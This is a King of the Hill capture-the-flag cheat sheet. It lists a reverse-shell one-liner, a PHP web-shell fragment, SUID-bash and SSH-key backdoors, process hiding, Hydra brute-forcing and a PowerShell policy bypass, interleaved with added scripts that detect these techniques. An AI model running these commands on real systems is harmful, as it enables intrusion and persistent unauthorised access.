Description: In the King of the Hill (KoTH) Attack-Defence challenge, your goal is to compromise the target machine and gain access to the coveted /root/king.txt file on Linux machines or C:\king.txt (or C:\Users\Administrator\king-server\king.txt) on Windows machines. Once you've successfully breached the system, your task is to maintain access and defend the king file from other players.
- You can check who is on the machine with the following command (it lists every process attached to a pseudo-terminal, i.e. every interactive session):

```bash
ps aux | grep pts
```

- If you're looking for your pts id/number:
- Killing the sessions of other players:

```bash
pkill -9 -t pts/N   # replace N with the pts number of the session you want to kill
```
If your opponent keeps killing your session, you can use the following commands to hide your shell (its pts entry) on the machine.

Get the PID of your shell (the process attached to your pts):

```bash
ps aux
```

- Hide your PTS:

```bash
mount -o bind /tmp /proc/your-PID-here
```

After this your opponent will no longer be able to find or kill your session with `ps`/`pkill`, because those tools read the process's entry under `/proc`, which is now covered by the bind mount. ;)
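The bind-mount trick hides the process from tools that walk `/proc`, but the mount itself is still recorded in `/proc/self/mountinfo`, which is where a defender (or the opponent) should look. The following Python check is an added example and is not part of the original cheat sheet: it parses mountinfo lines and reports every mount whose mount point sits on top of a `/proc/<pid>` entry. The sample mountinfo text is constructed for the demonstration; the function and file names are my own.

```python
import re
from typing import Dict, List

# Constructed sample of /proc/self/mountinfo lines (not captured from a real
# machine). Fields, per proc(5): id, parent, major:minor, root, mount point,
# options, optional tagged fields..., "-", fstype, source, super options.
# Line 3 is the interesting one: /tmp bind-mounted over /proc/1337.
SAMPLE_MOUNTINFO = """\
22 28 0:21 / /proc rw,nosuid,nodev,noexec,relatime shared:13 - proc proc rw
28 0 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
105 22 8:1 /tmp /proc/1337 rw,relatime shared:1 - ext4 /dev/sda1 rw
106 22 0:21 /sys /proc/sys rw,nosuid,nodev,noexec,relatime shared:13 - proc proc rw
"""

# Matches /proc/<pid> or anything below it; /proc/sys, /proc/self etc. do not match.
PROC_PID_RE = re.compile(r"^/proc/(\d+)(?:/.*)?$")


def find_proc_overlays(mountinfo_text: str) -> List[Dict[str, str]]:
    """Return every mount whose mount point lies under /proc/<pid>.

    ps, pkill and friends read a process's details from /proc/<pid>; a
    filesystem mounted on top of that directory makes the process invisible
    to them, but the mount itself is still listed in mountinfo.
    """
    overlays = []
    for line in mountinfo_text.splitlines():
        if not line.strip():
            continue
        # Everything before " - " is six fixed fields plus optional tagged
        # fields; everything after it is fstype, source and super options.
        before, _, after = line.partition(" - ")
        fields = before.split()
        if len(fields) < 6:
            continue  # malformed line: skip rather than crash
        mount_root, mount_point = fields[3], fields[4]
        match = PROC_PID_RE.match(mount_point)
        if not match:
            continue
        after_fields = after.split()
        overlays.append({
            "pid": match.group(1),
            "mount_point": mount_point,
            "fstype": after_fields[0] if after_fields else "?",
            "source": after_fields[1] if len(after_fields) > 1 else "?",
            "bound_from": mount_root,
        })
    return overlays


def scan_live_system(path: str = "/proc/self/mountinfo") -> List[Dict[str, str]]:
    """Run the same check against the running kernel's mount table."""
    with open(path, encoding="utf-8") as fh:
        return find_proc_overlays(fh.read())


if __name__ == "__main__":
    for hit in find_proc_overlays(SAMPLE_MOUNTINFO):
        print(f"PID {hit['pid']} is hidden: {hit['fstype']} ({hit['source']}, "
              f"subtree {hit['bound_from']}) mounted on {hit['mount_point']}")
```

On a live box, `scan_live_system()` reads the real mount table; a reported PID can be made visible again with the `umount` commands shown later on this page, applied to `/proc/<pid>`.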
- Use this website to generate reverse shell commands (bash, python, PHP, socat).
- Reverse shell generator + other useful commands for basic penetration testing.
- Easy-to-remember reverse shell one-liner:

```bash
bash -c "bash -i >& /dev/tcp/ 0>&1"
```

- Use this GitHub repo to get the code of php-reverse-shell.php.
- GTFOBins is a curated list of Unix binaries that can be used to escalate privileges.
- If you're looking for binaries with the SUID/SGID bit set (they run with the privileges of their owner, usually root):

1) `find / -perm -u=s -type f 2>/dev/null` (SUID files)
2) `find / -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null` (SUID or SGID files)
3) `find / -perm /4000 2>/dev/null` (SUID, any file type)
4) `find / -type f -user root -perm -u=s 2>/dev/null` (SUID files owned by root)
- If you're looking for binaries that the current user may run with sudo:

```bash
sudo -l
```

- If you're looking for flags:

1) `find / -type f -name "user.txt" 2>/dev/null`
2) `find / -name root.txt 2>/dev/null`
3) `find / -name .flag 2>/dev/null`
- Change the password of the root user and of other existing users with one-liners (the password is piped twice because passwd asks for it and then for a confirmation):

1) `echo -e "YOURpassword\nYOURpassword" | passwd root`
2) `echo -e "YOURpassword\nYOURpassword" | passwd user`
- Protect king.txt using chattr (`+i` makes the file immutable, `-i` removes the flag again):

```bash
chattr +i king.txt
chattr -i king.txt
```

- Use a chattr loop to keep your name locked in king.txt (it runs in the background and repeatedly strips the flags, rewrites the file and sets the flags again):

```bash
while [ 1 ]; do chattr -ia /root/king.txt 2>/dev/null; echo -n "YourNick" >| /root/king.txt 2>/dev/null; chattr +ia /root/king.txt 2>/dev/null; done &
```

- Use chattr to lock the /root folder:

```bash
cd / && chattr +i root
```
It is forbidden to change the permissions of binaries in a KoTH match (for example `chmod 700 /usr/bin/find`). The exception is chattr: the chattr binary is allowed to be removed from the machine (remove it after you have used it, i.e. after activating `chattr +i king.txt`).

- Remove chattr so no one will be able to change the attributes of king.txt:

```bash
rm /usr/bin/chattr
```

- If you have access to a KoTH box that has no chattr, you can get the chattr source from GitHub and compile it on the machine:

```bash
gcc chattr.c -o chattr
./chattr +i king.txt
```
If you try to put your nick in /root/king.txt and the message "Read-only file system" appears, the other player has used the mount technique (a read-only filesystem is mounted over the file or over /root).

- Unmount king.txt using umount (`-l` detaches the mount lazily, as soon as it is no longer busy):

```bash
umount -l /root
umount -l /root/king.txt
```
Get a shell by exploiting a file upload vulnerability (fragment of the uploaded PHP file):

```php
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
echo "</pre>";
```
Shell persistence using SSH (attacker terminal & target terminal)

Step 1: Navigate to the SSH directory on your target terminal:

```bash
cd /root/.ssh
```

Step 1.2: Return to your attacker terminal and execute:

```bash
cd /root/.ssh
```

Step 2: On your attacker terminal, generate a key pair:

```bash
ssh-keygen -t rsa
```

[Attacker Terminal] Step 3: Display the content of the generated public key (id_rsa.pub) using cat and write it into a file named authorized_keys:

```bash
cat id_rsa.pub
echo "<content of id_rsa.pub>" > authorized_keys
```

[Attacker Terminal] Step 4: Set the permissions for id_rsa:

```bash
chmod 600 id_rsa
```

[Attacker Terminal] Step 4.1: Send authorized_keys to the target system. :)

[Target Terminal] Step 5: Set the permissions for the .ssh directory and authorized_keys:

```bash
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
```

[Attacker Terminal] Step 6: Connect to the target system using the generated key:

```bash
ssh -i id_rsa root@
```

To avoid the need to re-exploit the host, we stored a copy of the root user's id_rsa SSH key on our local machine as key.rsa. Display the content of id_rsa using cat and copy it into key.rsa:

```bash
cat id_rsa >> key.rsa
```

To reconnect with the key we executed:

```bash
ssh -i key.rsa root@
```
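Both SSH persistence variants above leave a durable artifact: an extra entry in `/root/.ssh/authorized_keys`, or a copied private key that is valid as long as the original stays in that file. The audit below is an added Python example, not code from the original cheat sheet: it parses an authorized_keys file, computes OpenSSH-style SHA256 fingerprints from the raw key blobs, and reports entries that are malformed (declared key type does not match the blob) or absent from an allowlist of known fingerprints. The key blobs are constructed from dummy bytes and are not usable keys; every function name is my own.

```python
import base64
import binascii
import hashlib
import struct
from typing import Dict, List, Set, Tuple


def _ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire-format string (uint32 big-endian length + payload)."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf: bytes, offset: int = 0) -> Tuple[bytes, int]:
    """Decode one SSH wire-format string, returning (payload, next offset)."""
    (length,) = struct.unpack(">I", buf[offset:offset + 4])
    start = offset + 4
    return buf[start:start + length], start + length


def _constructed_ed25519_blob(fill: int) -> str:
    """Build a structurally valid ssh-ed25519 public-key blob from dummy bytes.

    The key material is one repeated byte, so this is NOT a usable key; it only
    gives the parser realistic input. A real blob has the same layout:
    string(key type) followed by string(32-byte public key).
    """
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes([fill]) * 32)
    return base64.b64encode(blob).decode()


# Constructed authorized_keys content (not from a real machine). The last
# entry declares ssh-rsa but carries an ed25519 blob: a malformed entry.
SAMPLE_AUTHORIZED_KEYS = (
    f"ssh-ed25519 {_constructed_ed25519_blob(0x01)} admin@workstation\n"
    "# comment lines and blank lines are ignored\n"
    "\n"
    f'command="/usr/bin/uptime",no-pty ssh-ed25519 {_constructed_ed25519_blob(0x02)} monitor\n'
    f"ssh-rsa {_constructed_ed25519_blob(0x03)} unknown@unknown-host\n"
)


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style fingerprint: SHA256 over the raw blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[Dict[str, str]]:
    """Parse entries of the form '[options] keytype blob [comment]'.

    Limitation: options containing quoted spaces (command="a b") are split
    naively; OpenSSH's own parser handles those, this demo does not.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        has_options = not parts[0].startswith(("ssh-", "ecdsa-", "sk-"))
        if len(parts) < (3 if has_options else 2):
            continue  # not a key entry: skip instead of crashing
        if has_options:
            options, keytype, blob, comment = parts[0], parts[1], parts[2], " ".join(parts[3:])
        else:
            options, keytype, blob, comment = "", parts[0], parts[1], " ".join(parts[2:])
        try:
            embedded_type, _ = _read_ssh_string(base64.b64decode(blob, validate=True))
        except (binascii.Error, struct.error):
            embedded_type = b"<undecodable>"
        entries.append({
            "options": options,
            "type": keytype,
            "embedded_type": embedded_type.decode("ascii", errors="replace"),
            "fingerprint": fingerprint(blob),
            "comment": comment,
        })
    return entries


def audit_authorized_keys(text: str, allowed_fingerprints: Set[str]) -> List[str]:
    """Return one finding per entry that is malformed or not on the allowlist."""
    findings = []
    for entry in parse_authorized_keys(text):
        who = entry["comment"] or "no comment"
        if entry["type"] != entry["embedded_type"]:
            findings.append(f"type mismatch: declared {entry['type']}, blob says "
                            f"{entry['embedded_type']} ({who})")
        if entry["fingerprint"] not in allowed_fingerprints:
            findings.append(f"unexpected key {entry['fingerprint']} ({who})")
    return findings


if __name__ == "__main__":
    known = {e["fingerprint"] for e in parse_authorized_keys(SAMPLE_AUTHORIZED_KEYS)[:2]}
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, known):
        print(finding)
```

The fingerprints this produces are the same `SHA256:` values `ssh-keygen -lf` prints for a real key, so the allowlist can be built once from a known-good file and the audit re-run from cron against `/root/.ssh/authorized_keys`.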
Python3 web server (attacker machine), used to serve files to the target:

```bash
python3 -m http.server 8080
```

Fetch files on a Linux target:

Fetch files on a Windows target:

```cmd
certutil.exe -urlcache -f
```
Run this command in your root shell to set the SUID bit on bash:

```bash
sudo chmod +s /bin/bash
```

Now, whenever you access this system again, run this command (`-p` tells bash to keep the effective user id instead of dropping it):

```bash
/bin/bash -p
```
Use Hydra to brute-force a login page:

```bash
hydra -l admin -P passlist.txt http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
```

Use Hydra to brute-force the SSH service:

```bash
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh
```
- MSF persistence backdoor:
- Metasploit Unleashed: more hacking tricks and commands
```powershell
powershell.exe -NoProfile -ExecutionPolicy Bypass -File malicious.ps1
```

The command shows that PowerShell was used to execute a script named malicious.ps1, with potentially harmful intentions. Here's a breakdown:

- `powershell.exe`: Launches the PowerShell environment.
- `-NoProfile`: Runs PowerShell without loading the user's profile scripts, so that any logging hooks, aliases or restrictions defined there never take effect.
- `-ExecutionPolicy Bypass`: Bypasses the execution policy so the script runs even if scripts are restricted (the execution policy is a safeguard against running scripts by accident, not a security boundary, which is why a single switch is enough to turn it off).
- `-File malicious.ps1`: Executes the specified script, which is likely malicious.

This is a common technique used in attacks like fileless malware or script-based exploits. Process-creation auditing with command-line logging (Windows Event ID 4688 or Sysmon Event ID 1) and PowerShell Script Block Logging (Event ID 4104) record such invocations, so the combination of switches above is a useful detection signal.
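To turn the breakdown above into something a defender can run, here is an added Python example (not from the original page) that scores process-creation log lines for the PowerShell switches just described, including the short aliases PowerShell accepts (`-nop`, `-ep`, `-enc`, `-w hidden`). The log lines are constructed for the demonstration and only imitate the `CommandLine` field of a Sysmon or 4688 event; the field format, thresholds and function names are my own.

```python
import re
from typing import Dict, List

# Constructed process-creation log lines (not from a real host). The
# CommandLine="..." field imitates what Sysmon Event ID 1 or Windows 4688
# auditing with command-line logging records.
SAMPLE_EVENTS = [
    'ts=2024-01-01T10:00:00Z user=alice CommandLine="powershell.exe -NoProfile -ExecutionPolicy Bypass -File malicious.ps1"',
    'ts=2024-01-01T10:00:05Z user=alice CommandLine="powershell.exe -Command Get-Process"',
    'ts=2024-01-01T10:00:09Z user=svc CommandLine="pwsh.exe -nop -ep bypass -w hidden -enc SQBFAFgA"',
    'ts=2024-01-01T10:00:12Z user=bob CommandLine="C:\\Windows\\notepad.exe notes.txt"',
]

PS_BINARY = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
CMDLINE = re.compile(r'CommandLine="([^"]*)"')

# Every pattern is anchored on a switch (including PowerShell's accepted
# abbreviations), so a script whose name merely contains "bypass" does not fire.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p|x)\s+(?:bypass|unrestricted)\b", re.I),
    "no_profile":         re.compile(r"-no(?:p|profile)\b", re.I),
    "hidden_window":      re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "encoded_command":    re.compile(r"-e(?:c|nc|ncodedcommand)\b", re.I),
    "script_file":        re.compile(r"-f(?:ile)?\s+\S+\.ps1", re.I),
}


def score_event(line: str) -> Dict[str, object]:
    """Extract the command line and count which PowerShell evasion switches it uses."""
    match = CMDLINE.search(line)
    cmd = match.group(1) if match else ""
    hits: List[str] = []
    if PS_BINARY.search(cmd):  # only PowerShell launches are scored
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return {"cmdline": cmd, "indicators": hits, "score": len(hits)}


def triage(events: List[str], threshold: int = 2) -> List[Dict[str, object]]:
    """Return events with at least `threshold` indicators, highest score first."""
    flagged = [s for s in map(score_event, events) if s["score"] >= threshold]
    return sorted(flagged, key=lambda s: s["score"], reverse=True)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"score={hit['score']} {hit['indicators']}: {hit['cmdline']}")
```

A threshold of two keeps a plain `-File script.ps1` launch from an admin's scheduled task below the line, while the combinations from the cheat sheet (`-NoProfile -ExecutionPolicy Bypass -File ...`) score three or more; in production the same indicators would feed a SIEM rule rather than a sort.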